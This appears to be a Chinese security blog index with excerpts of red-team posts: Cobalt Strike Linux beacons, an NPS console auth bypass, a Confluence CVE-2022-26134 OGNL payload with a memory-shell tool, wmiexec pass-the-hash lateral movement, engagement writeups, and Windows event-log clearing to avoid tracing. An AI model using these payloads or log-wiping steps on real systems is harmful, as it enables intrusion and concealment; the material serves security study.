红队技术-Cobaltstrike之Linux上线
edit-gencon学习一下 TryGOTry 师傅,项目基本都配置好只需要改动相关参数即可,个人推荐这种方式,CrossC2 坑比较多
https://github.com/TryGOTry/edit-gencon
使用项目中的 gmail.profile 作为 profile 配置启动 teamserver,或修改自己常用 profile 的相关参数
新建一个监听器,看自己喜好设置HTTP或HTTPS,这里生成https的监听器
拷贝 cs 服务端的cobaltstrike.beacon_keys到本地
1sz .cobaltstrike.beacon_keys
接着解密获取到加密的key,下载工具编译即可
https://github.com/darkr4y/geacon/tree/master/tools/BeaconTool
1java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa
生成后的内容填入到项目的 config.go 里面去,并把 C2 内容替换为 VPS:端口
基本上就配置完成,其他参数如 ...
红队技术-接管NPS控制台
红队反制-接管NPS控制台最近看到有意思的东西,参考千寻瀑的文章复现了一下
https://github.com/ehang-io/nps/releases/tag/v0.26.10
到github上下载相应的版本,我这里用的win就下载win相关的客户端和服务端
下载完成后,输入以下命令,接着访问8080端口进入web页面,默认账号密码为 admin/123
12nps.exe installnps.exe start
客户端连接
web控制台正常是需要密码才能登录的,但是由于默认配置导致可以伪造认证进行访问,就是时间有点短只有20s
漏洞位置位于web\controllers\base.go
而在nps.conf配置文件里,auth_key默认是被注释掉的
因此只需要添加auth_key和timestamp两个参数即可登入后台和使用相关功能点
使用脚本:
12345678import timeimport hashlibnow = time.time()m = hashlib.md5()m.update(str(int(now)).encode("utf8 ...
渗透测试-登陆口js前端加密绕过
登陆口js前端加密绕过环境搭建1、首先得安装maven,具体方法百度
2、下载 https://github.com/c0ny1/jsEncrypter c0ny1师傅写好的burp插件
运行mvn package进行编译,编译好后会多出一个target文件夹
test文件夹是本地测试demo跟常见加密算法的js脚本
script脚本为自带的phantomjs服务端模板文件
3、把target文件夹里面的jar插件添加到burp里面
4、安装phomtomjs,并把phantomjs-2.1.1-windows\bin添加到环境变量,测试出现下图为成功
https://phantomjs.org/download.html
本地实践1、安装phpstudy,然后把jsencrypter/test/webapp整个文件夹复制到phpstudy
2、运行phpstudy,访问 /webapp 出现下图为成功
3、登录抓取数据包,发现进行了加密
4、f12打开控制台进行调试,首先查看 index,可以看到调用了 JSEncrypt.js 文 ...
云安全-常见漏洞学习笔记
面向对象的存储,也被称为云存储,云存储主要分为三部分,分别是 key、data 和 Metadata
假设一个地址为 http//aaa.s3.ap-northeast-2.amazonaws.c/bbb
123这里aaa为存储桶的名称,bbb为keyData 就是存储的数据本体Metadata 就是元数据,是数据的标签、描述之类的信息
环境搭建12345安装dockeryum install docker启动dockerservice docker startchkconfig docker on
腾讯云拉取
123docker pull registry.cn-beijing.aliyuncs.c/huoxian_p/terraformgoat_tencentcloud:0.0.4docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.c/huoxian_p/terraformgoat_tencentcloud:0.0.4docker ...
漏洞复现-confluence远程代码执行
1/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
使用此工具直接写入内存马
红队技术-各端口横向移动方法
135端口执行命令
12python wmiexec-pro.py administrator:Admin12345@192.168.186.136 exec-command -command "whoami" -with-outputpython wmiexec-pro.py -hashes :5571e12eef026de606df1ff9d4dab6f8 administrator@192.168.204.72 exec-command -command "whoami" -with-output
上传文件
1python wmiexec-pro.py administrator:Admin12345@192.168.186.136 filetransfer -upload -src-file "/root/Desktop/decode.exe" -dest-file "C:\users\public\test.exe"
wmiexec12python wmiexec.py -hashes : ...
渗透测试-soapUI调试webservice
渗透测试过程中,可能会碰到以wsdl结尾的站点
这时候可以通过soapUI进行测试会比较方便
https://github.com/SmartBear/soapui
下载完成后,点击soapui.bat运行程序,直接点击jar包运行会报错
1、新建一个project
2、add wsdl
3、填入地址
4、发送payload进行测试
攻防演练-某市级教育厅HW复盘总结
前言正如今年的高考题目,学习应从本手开始,把基础打好,才能在实战中打出妙手操作,如果眼高手低,往往会落到俗手的下场
这次攻防演练每个队伍分配不同的目标,有些队伍拿的点可以直接nday打,有些队伍外网打点十分困难比如我们,但分数是是统一算的,可以说不是那么的公平
不过也算是提供了些许经验,简单做一下总结,都是比较基础的东西,如有写的不正确的地方欢迎各位师傅指正
外网打点敏感信息泄露一般来说学校外网能拿直接权限的点已经很少了,web应用大多是放在vpn后面,因此能弄到一个vpn账号可以说是事半功倍
另外还可以通过语法筛选出存在默认弱口令的系统,常用命令如下:
1234567#google语法site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码#github*.edu.cn password查看方式优先选择最近更新,太久远的基本上失效了
这里队友收集到了某个目标的vpn账号,使用的是 姓名拼音/12345678 弱口令
进去内网后能访问的只有一个OA系统,测试了一下没发现什么东西,寻找其他突破口
shiro无链常规的打点可通过fofa、hu ...
攻防演练-某集团红队检测
外网打点资产识别使用Ehole快速识别重点资产
链接:https://github.com/EdgeSecurityTeam/EHole
1Ehole.exe -fofa 检测的域名
寻找口子1、每个网站可以尝试默认密码或’admin’、1qazxsw2====等类似弱口令
这里通过sysadmin/1 成功登入泛微后台
2、接着浏览其他站点,这里运气比较好发现了用友的nday
3、访问接口/servlet/~ic/bsh.servlet.BshServlet执行命令
4、另外还存在用友nc任意文件上传漏洞,直接上哥斯拉
内网渗透杀软识别1tasklist /svc
把之前准备好的bypass360马子扔上去,成功上线
隧道搭建ping了一下发现机器出网,可以上frp搭建反向代理隧道
proxifier配置相应的端口账密便可以进入内网
由于周六日没人防守,直接上fscan对各个C段开扫,发现网段里的弱口令或web漏洞,帮助我们拿下机器进一步横向,拿到机器后先做信息搜集,网段,机器信息,敏感文件,xshell、n ...
痕迹清除-Windows日志清除绕过
windows日志清除目录在我们日常的安全攻击过程中,登录尝试、流程开发、其他用户和设备行为都记录在 Windows 事件日志中,这将会增大自身被溯源的风险,针对于windows日志痕迹清除主要总结了以下这些方法
关闭日志服务12345#找出日志进程的PIDGet-WmiObject -Class win32_service -Filter "name = 'eventlog'" #kill掉对应PIDtaskkill /F /PID 1792
重启可进行恢复
wevtutil它是一个系统工具,可让您查找有关事件日志和发布者的详细信息。您还可以使用此命令安装和卸载事件清单、导出、存档和清除日志。
12统计日志列表,查询所有日志信息,包含时间,数目wevtutil.exe gli Application
12查看指定类别的日志内容wevtutil qe /f:text Application
12删除该类日志所有内容wevtutil cl Application
但清除完会留下1012或104的系统日志
12获取最近十 ...